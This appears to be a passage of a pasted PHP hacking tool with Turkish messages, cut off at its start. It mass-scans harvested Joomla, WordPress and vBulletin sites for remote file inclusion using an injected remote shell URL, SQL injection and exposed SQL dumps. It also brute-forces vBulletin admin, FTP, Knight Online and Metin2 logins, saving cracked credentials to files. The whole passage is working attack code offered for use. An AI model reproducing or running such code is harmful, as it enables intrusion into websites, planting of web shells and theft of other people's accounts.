- $bak_10 = self::curl($sites.$this->rfi_10.$this->shell);
- $bak_11 = self::curl($sites.$this->rfi_11.$this->shell);
- $bak_12 = self::curl($sites.$this->rfi_12.$this->shell);
- $bak_13 = self::curl($sites.$this->rfi_13.$this->shell);
- $bak_14 = self::curl($sites.$this->rfi_14.$this->shell);
- $bak_15 = self::curl($sites.$this->rfi_15.$this->shell);
- $bak_16 = self::curl($sites.$this->rfi_16.$this->shell);
- $bak_17 = self::curl($sites.$this->rfi_17.$this->shell);
- $bak_18 = self::curl($sites.$this->rfi_18.$this->shell);
- $bak_19 = self::curl($sites.$this->rfi_19.$this->shell);
- $bak_20 = self::curl($sites.$this->rfi_20.$this->shell);
- $bak_21 = self::curl($sites.$this->rfi_21.$this->shell);
- if(eregi($this->shellkey,$bak_1)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_1.$this->shell);
- }
- if(eregi($this->shellkey,$bak_2)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_2.$this->shell);
- }
- if(eregi($this->shellkey,$bak_3)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_3.$this->shell);
- }
- if(eregi($this->shellkey,$bak_4)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_4.$this->shell);
- }
- if(eregi($this->shellkey,$bak_5)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_5.$this->shell);
- }
- if(eregi($this->shellkey,$bak_6)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_6.$this->shell);
- }
- if(eregi($this->shellkey,$bak_7)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_7.$this->shell);
- }
- if(eregi($this->shellkey,$bak_8)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_8.$this->shell);
- }
- if(eregi($this->shellkey,$bak_9)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_9.$this->shell);
- }
- if(eregi($this->shellkey,$bak_10)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_10.$this->shell);
- }
- if(eregi($this->shellkey,$bak_11)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_11.$this->shell);
- }
- if(eregi($this->shellkey,$bak_12)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_12.$this->shell);
- }
- if(eregi($this->shellkey,$bak_13)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_13.$this->shell);
- }
- if(eregi($this->shellkey,$bak_14)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_14.$this->shell);
- }
- if(eregi($this->shellkey,$bak_15)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_15.$this->shell);
- }
- if(eregi($this->shellkey,$bak_16)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_16.$this->shell);
- }
- if(eregi($this->shellkey,$bak_17)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_17.$this->shell);
- }
- if(eregi($this->shellkey,$bak_18)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_18.$this->shell);
- }
- if(eregi($this->shellkey,$bak_19)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_19.$this->shell);
- }
- if(eregi($this->shellkey,$bak_20)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_20.$this->shell);
- }
- if(eregi($this->shellkey,$bak_21)){
- echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_21.$this->shell);
- }
- }
- echo "\nJoomla RFI Aramasi bitti";
- }
- public function wprfi(){
- $explode = explode("\n",file_get_contents("wordpress.txt"));
- foreach($explode as $sites){
- $sites = trim($sites);
- $bak_1 = self::curl($sites.$this->wprfi_1.$this->shell);
- $bak_2 = self::curl($sites.$this->wprfi_2.$this->shell);
- $bak_3 = self::curl($sites.$this->wprfi_3.$this->shell);
- $bak_4 = self::curl($sites.$this->wprfi_4.$this->shell);
- $bak_5 = self::curl($sites.$this->wprfi_5.$this->shell);
- $bak_6 = self::curl($sites.$this->wprfi_6.$this->shell);
- $bak_7 = self::curl($sites.$this->wprfi_7.$this->shell);
- $bak_8 = self::curl($sites.$this->wprfi_8.$this->shell);
- $bak_9 = self::curl($sites.$this->wprfi_9.$this->shell);
- $bak_10 = self::curl($sites.$this->wprfi_10.$this->shell);
- if(eregi($this->shellkey,$bak_1)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_1.$this->shell);
- }
- if(eregi($this->shellkey,$bak_2)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_2.$this->shell);
- }
- if(eregi($this->shellkey,$bak_3)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_3.$this->shell);
- }
- if(eregi($this->shellkey,$bak_4)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_4.$this->shell);
- }
- if(eregi($this->shellkey,$bak_5)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_5.$this->shell);
- }
- if(eregi($this->shellkey,$bak_6)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_6.$this->shell);
- }
- if(eregi($this->shellkey,$bak_7)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_7.$this->shell);
- }
- if(eregi($this->shellkey,$bak_8)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_8.$this->shell);
- }
- if(eregi($this->shellkey,$bak_9)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_9.$this->shell);
- }
- if(eregi($this->shellkey,$bak_10)){
- echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_10.$this->shell);
- }
- }
- echo "\nWordpress RFI Aramasi bitti";
- }
- public function vbrute_1($url){
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$url.$this->url_7);
- curl_setopt($curl,CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- curl_setopt($curl,CURLOPT_COOKIEJAR, 'vbcookie.txt');
- curl_setopt($curl,CURLOPT_COOKIEFILE, 'vbcookie.txt');
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- }
- public function vbrute_2(){
- $password = explode("\n",file_get_contents($this->wordlist));
- foreach($password as $passwords){
- $passwords=trim($passwords);
- $passwords=md5($passwords);
- $explode = explode("\n",file_get_contents("vbulletin.txt"));
- foreach($explode as $sites){
- $sites = trim($sites);
- $hash = self::vbhashAl($sites);
- $url = $sites.$this->url_8;
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$url);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- curl_setopt($curl,CURLOPT_COOKIEJAR, 'vbcookie.txt');
- curl_setopt($curl,CURLOPT_COOKIEFILE, 'vbcookie.txt');
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,'url=%2Fadmincp%2F&s='.$hash.'&securitytoken=guest&logintype=cplogin&do=login&vb_login_md5password='.$passwords.'&vb_login_md5password_utf='.$passwords.'&vb_login_username=Admin&vb_login_password=&cssprefs=');
- curl_setopt($curl,CURLOPT_TIMEOUT,25);
- $exec=curl_exec($curl);
- curl_close($curl);
- if(eregi($this->vbreg,$exec)){
- echo $sites." -> vBulletin Panel Girisi bulundu vbrute.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("vbrute.txt",$sites.$this->url_7);
- }
- }
- }
- @unlink("vbcookie.txt");
- echo "\nvBulletin Brute Force bitti.";
- }
- public function vbhashAl($url){
- $adres=self::vbrute_1($url);
- preg_match_all($this->vbregex,$adres,$s);
- return $s[1][0];
- }
- public function datasql(){
- $explode = explode("\n",file_get_contents("vbulletin.txt"));
- foreach($explode as $siteler){
- $siteler = trim($siteler);
- $login = self::curl($siteler.$this->url_9);
- if(eregi($this->datareg,$login)){
- echo $siteler." -> vBulletin Data SQL Bulundu datasql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("datasql.txt",$siteler.$this->url_9);
- }
- }
- echo "\nvBulletin Data SQL Arama bitti";
- }
- public function pagerank(){
- $explode = explode("\n",file_get_contents("reverse.txt"));
- foreach($explode as $siteler){
- $siteler = trim($siteler);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,'http://www.developertutorials.com/tools/google-pagerank-checker.php');
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)');
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,'url='.$siteler.'&Submit1=Get+PageRank');
- $exec=curl_exec($curl);
- curl_close($curl);
- $regex = "#<font color='(.*?)'>(.*?)</font>#";
- preg_match_all($regex,$exec,$pr);
- foreach($pr[0] as $pagerank){
- $pagerank = ereg_replace("<font color='#006600'>Google PageRank ","",$pagerank);
- $pagerank = ereg_replace("</font>","",$pagerank);
- echo $siteler." Pagerank ".$pagerank."\n";
- ob_flush();
- flush();
- }
- }
- echo "\nPagerank Check bitti.";
- }
- public function sqlinj(){
- $explode = explode("\n",file_get_contents("reverse.txt"));
- foreach($explode as $sites){
- $sites=trim($sites);
- $gir = self::curl($sites);
- preg_match_all($this->sql,$gir,$link);
- foreach($link[0] as $links){
- if(eregi('id=',$links)){
- $url = $links."%27";
- $login = self::curl($url);
- if(eregi($this->hata[0],$login)){
- echo $sites." -> SQL Syntax bulundu sql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("sql.txt",$url);
- }elseif(eregi($this->hata[1],$login)){
- echo $sites." -> MySQL bulundu sql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("sql.txt",$url);
- }elseif(eregi($this->hata[2],$login)){
- echo $sites." -> MySQL bulundu sql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("sql.txt",$url);
- }elseif(eregi($this->hata[3],$login)){
- echo $sites." -> MySQL bulundu sql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("sql.txt",$url);
- }elseif(eregi($this->hata[4],$login)){
- echo $sites." -> Unclosed bulundu sql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("sql.txt",$url);
- }
- }
- }
- }
- echo "\nSQL Taramasi bitti.";
- }
- public function ftpbrute($site){
- if(!file_exists("ftp_user.txt")){
- echo "\nLutfen ftp_user.txt ye user listinizi girin";
- exit;
- }elseif(!file_exists("ftp_pass.txt")){
- echo "\nLutfen ftp_pass.txt ye pass listinizi girin";
- exit;
- }
- $users = explode("\n",file_get_contents("ftp_user.txt"));
- $pass = explode("\n",file_get_contents("ftp_pass.txt"));
- foreach($users as $username){
- $username = trim($username);
- foreach($pass as $password){
- $password = trim($password);
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($curl, CURLOPT_URL, 'ftp://'.$username.':'.$password.'@'.$site.'');
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_FTPLISTONLY,1);
- curl_setopt($curl, CURLOPT_TIMEOUT,15);
- $exec = curl_exec($curl);
- curl_close($curl);
- if(curl_errno($curl)==0){
- echo "Username : ".$username." Password : ".$password." -> FTP Kirildi ftpcracked.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("ftpcracked.txt","ftp://".$site." User : ".$username." Pass : ".$password."");
- }
- }
- }
- echo "\nFTP Kirma islemi bitti";
- }
- public function kobrute(){
- if(!file_exists("ko_user.txt")){
- echo "\nLutfen ko_user.txt ye user listinizi girin";
- exit;
- }elseif(!file_exists("ko_pass.txt")){
- echo "\nLutfen ko_pass.txt ye pass listinizi girin";
- exit;
- }
- $userler = explode("\n",file_get_contents("ko_user.txt"));
- $passlar = explode("\n",file_get_contents("ko_pass.txt"));
- foreach($userler as $users){
- $users = trim($users);
- foreach($passlar as $passes){
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
- curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_HEADER,0);
- curl_setopt($curl,CURLOPT_URL,'https://gamersfirst.ekolay.net/action/login.php');
- curl_setopt($curl,CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)");
- curl_setopt($curl,CURLOPT_COOKIEJAR,'kocookie.txt');
- curl_setopt($curl,CURLOPT_COOKIEFILE,'kocookie.txt');
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,'successRedirectUrl=%2F&failureRedirectUrl=%2Flogin.php%3Fretry&loginuser='.$users.'&loginpass='.$passes.'&loginsubmit=');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,10);
- $run=curl_exec($curl);
- curl_close($curl);
- if(eregi('logout.php',$run)){
- echo "Username : ".$users." Password : ".$passes." -> Account Kirildi kocrack.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("kocrack.txt","Username : ".$users." Password : ".$passes."");
- }
- }
- }
- @unlink("kocookie.txt");
- echo "\nKnight OnLine Crack islemi bitti";
- }
- public function metinbrute(){
- if(!file_exists("metin_user.txt")){
- echo "\nLutfen metin_user.txt ye user listinizi girin";
- exit;
- }elseif(!file_exists("metin_pass.txt")){
- echo "\nLutfen metin_pass.txt ye pass listinizi girin";
- exit;
- }
- $userler = explode("\n",file_get_contents("metin_user.txt"));
- $passlar = explode("\n",file_get_contents("metin_pass.txt"));
- foreach($userler as $users){
- $users = trim($users);
- foreach($passlar as $passes){
- $passes = trim($passes);
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,"http://www.metin2.org/user/login");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)');
- curl_setopt($curl,CURLOPT_COOKIEJAR,"metincookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE,"metincookie.txt");
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$users."&password=".$passes."");
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- $run = curl_exec($curl);
- curl_close($curl);
- if(eregi("Hesap Bilgileri",$run)){
- echo "Username : ".$users." Password : ".$passes." -> Account Kirildi metincrack.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("metincrack.txt","Username : ".$users." Password : ".$passes."");
- }
- }
- }
- @unlink("metincookie.txt");
- echo "\nMetin2 Crack islemi bitti";
- }
- }
- $tool=new H_Tool();
- if($argv[1]==""){
- $tool->ana();
- }
- if($argv[1]=="komutlar"){
- $tool->komutlar();
- }
- if($argv[1]){
- $tool->reverse($argv[1]);
- }
- if($argv[1]=="ayir"){
- echo "\nAraniyor Bekleyin...\n\n";
- ob_flush();
- flush();
- $tool->ayir();
- }
- if($argv[1]=="jomtoken"){
- echo "\nJoomla Token Taraniyor bekleyin\n\n";
- ob_flush();
- flush();
- $tool->token_2();
- }
- if($argv[1]=="jombrute"){
- echo "\nJoomla Brute Force basladi bekleyin\n\n";
- ob_flush();
- flush();
- $tool->jombrute_2();
- }
- if($argv[1]=="wpbrute"){
- echo "\nWordpress Brute Forcer basladi bekleyin\n\n";
- ob_flush();
- flush();
- $tool->wpbrute();
- }
- if($argv[1]=="osreset"){
- echo "\nosCommerce admin reset deneniyor...\n\n";
- ob_flush();
- flush();
- $tool->osc_login();
- }
- if($argv[1]=="shellara"){
- echo "\nShell arama basladi...\n\n";
- ob_flush();
- flush();
- $tool->shellara();
- }
- if($argv[1]=="jomsql"){
- echo "\nJoomla SQL Injection Araniyor...\n\n";
- ob_flush();
- flush();
- $tool->jomsql();
- }
- if($argv[1]=="wpsql"){
- echo "\nWordpress SQL Injection Araniyor...\n\n";
- ob_flush();
- flush();
- $tool->wpsql();
- }
- if($argv[1]=="jomlfi"){
- echo "\nJoomla LFI Araniyor...\n\n";
- ob_flush();
- flush();
- $tool->jomlfi();
- }
- if($argv[1]=="jomrfi"){
- echo "\nJoomla RFI Araniyor...\n\n";
- ob_flush();
- flush();
- $tool->jomrfi();
- }
- if($argv[1]=="wprfi"){
- echo "\nWordpress RFI Araniyor...\n\n";
- ob_flush();
- flush();
- $tool->wprfi();
- }
- if($argv[1]=="vbrute"){
- echo "\nvBulletin Brute Force basladi...\n\n";
- ob_flush();
- flush();
- $tool->vbrute_2();
- }
- if($argv[1]=="datasql"){
- echo "\nvBulletin Data SQL Aramasi basladi...\n\n";
- ob_flush();
- flush();
- $tool->datasql();
- }
- if($argv[1]=="pagerank"){
- echo "\nPagerank Check basladi...\n\n";
- ob_flush();
- flush();
- $tool->pagerank();
- }
- if($argv[1]=="sqlinj"){
- echo "\nSQL Injection Taramasi basladi...\n\n";
- ob_flush();
- flush();
- $tool->sqlinj();
- }
- if($argv[1]=="ftpbrute"){
- echo "\nFTP Kirma islemi basladi...\n\n";
- ob_flush();
- flush();
- $tool->ftpbrute($argv[2]);
- }
- if($argv[1]=="kobrute"){
- echo "\nKnight OnLine Crack islemi basladi...\n\n";
- ob_flush();
- flush();
- $tool->kobrute();
- }
- if($argv[1]=="metinbrute"){
- echo "\nMetin2 Crack islemi basladi...\n\n";
- ob_flush();
- flush();
- $tool->metinbrute();
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement